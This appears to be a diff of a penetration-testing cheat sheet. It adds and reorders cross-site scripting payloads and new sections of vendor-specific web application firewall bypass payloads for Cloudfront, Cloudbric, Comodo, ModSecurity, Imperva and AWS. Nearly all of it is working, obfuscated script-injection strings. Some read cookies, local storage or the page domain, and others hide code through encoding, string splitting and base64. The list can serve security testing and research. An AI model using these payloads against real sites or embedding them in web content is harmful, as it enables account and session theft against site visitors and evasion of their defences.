skipped 343 lines 344 344 ``` 345 345 <svg%0Aonauxclick=0;[1].some(confirm)// 346 346 347 - <svg onload=alert% 26 % 230000000040 " " ) > 347 + <svg/ onload={ alert` 1 ` } > 348 348 349 349 <a/href=j	a	v	asc
ri	pt:(a	l	e	r	t	(1))> 350 - <svg onx=() onload=(confirm)(1)> 351 - 352 - <svg onx=() onload=(confirm)(document.cookie)> 353 - 354 - <svg onx=() onload=(confirm)(JSON.stringify(localStorage))> 355 - 356 - Function("\x61\x6c\x65\x72\x74\x28\x31\x29")(); 357 350 358 351 "><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;document.cookie%26%2300000000000000000041; 359 352 360 - Function("\x61\x6c\x65\x72\x74\x28\x31\x29")(); 361 - 362 353 "><onx=[] onmouseover=prompt(1)> 363 354 364 - %2sscript%2ualert()%2s/script%2u - xss popup 365 - 366 - <svg onload=alert%26%230000000040"1")> 355 + %2sscript%2ualert()%2s/script%2u 367 356 368 357 "Onx=() onMouSeoVer=prompt(1)>"Onx=[] onMouSeoVer=prompt(1)>"/*/Onx=""//onfocus=prompt(1)>"//Onx=""/*/%01onfocus=prompt(1)>"%01onClick=prompt(1)>"%2501onclick=prompt(1)>"onClick="(prompt)(1)"Onclick="(prompt(1))"OnCliCk="(prompt`1`)"Onclick="([1].map(confirm)) 369 358 370 359 [1].map(confirm)'ale'+'rt'()a	l	e	r	t(1)prompt(1)prompt(1)prompt%26%2300000000000000000040;1%26%2300000000000000000041;(prompt())(prompt``) 360 + 361 + <svg onload=alert%26%230000000040"1")> 371 362 372 363 <svg onload=prompt%26%230000000040document.domain)> 373 364 skipped 5 lines 379 370 380 371 <a id=x tabindex=1 onbeforedeactivate=print(`XSS`)></a><input autofocus> 381 372 373 + <img ignored=() src=x onerror=prompt(1)> 374 + 375 + <svg onx=() onload=(confirm)(1)> 376 + 377 + <--`<img/src=` onerror=confirm``> --!> 378 + 379 + <img src=x onerror="a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}};self[Object.keys(self)[a()]](document.domain)"> 380 + 381 + <j id=x style="-webkit-user-modify:read-write" onfocus={window.onerror=eval}throw/0/+name>H</j>#x 382 + 383 + '"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'> 384 + 385 + '"><img/src/onerror=.1|alert``> 386 + 382 387 :javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie 383 388 384 - <img ignored=() src=x onerror=prompt(1)> 389 + Function("\x61\x6c\x65\x72\x74\x28\x31\x29")(); 390 + ``` 391 + 392 + 2. Cloudfront 393 + ``` 394 + ">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x onerror=javascript:alert(`cloudfrontbypass`)//'> 395 + 396 + <--`<img%2fsrc%3d` onerror%3dalert(document.domain)> --!> 397 + 398 + "><--<img+src= "><svg/onload+alert(document.domain)>> --!> 385 399 ``` 386 400 401 + 3. Cloudbric 402 + ``` 403 + <a69/onclick=[1].findIndex(alert)>pew 404 + ``` 405 + 406 + 4. Comodo WAF 407 + ``` 408 + <input/oninput='new Function`confir\u006d\`0\``'> 409 + 410 + <p/ondragstart=%27confirm(0)%27.replace(/.+/,eval)%20draggable=True>dragme 411 + ``` 412 + 413 + 5. ModSecurity 414 + ``` 415 + <a href="jav%0Dascript:alert(1)"> 416 + ``` 417 + 418 + 6. Imperva 419 + ``` 420 + <input id='a'value='global'><input id='b'value='E'><input 'id='c'value='val'><input id='d'value='aler'><input id='e'value='t(documen'><input id='f'value='t.domain)'><svg+onload[\r\n]=$[a.value+b.value+c.value](d.value+e.value+f.value)> 421 + 422 + <x/onclick=globalThis['\u0070r\u006f'+'mpt']<)>clickme 423 + 424 + <a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click 425 + 426 + <a69/onclick=write()>pew 427 + 428 + <details/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];"/open> 429 + 430 + <svg onload\r\n=$.globalEval("al"+"ert()");> 431 + 432 + <svg/onload=self[`aler`%2b`t`]`1`> 433 + 434 + %3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%2523x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%2526%2523x29%3B%22%3E 435 + 436 + <iframe/onload='this["src"]="javas	cript:al"+"ert``"';> 437 + 438 + <img/src=q onerror='new Function`al\ert\`1\``'> 439 + 440 + <object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object> 441 + ``` 442 + 443 + 7. AWS 444 + ``` 445 + <script>eval(atob(decodeURIComponent(confirm`1`)))</script> 446 + ``` 447 + 448 + If you want to see the other payload for other WAF, check this [link](https://github.com/0xInfection/Awesome-WAF) 449 + 387 450 ## References 388 451 - [Brute Logic](https://brutelogic.com.br/) 452 + - [Awesome-WAF](https://github.com/0xInfection/Awesome-WAF) 389 453 - Some random twitter posts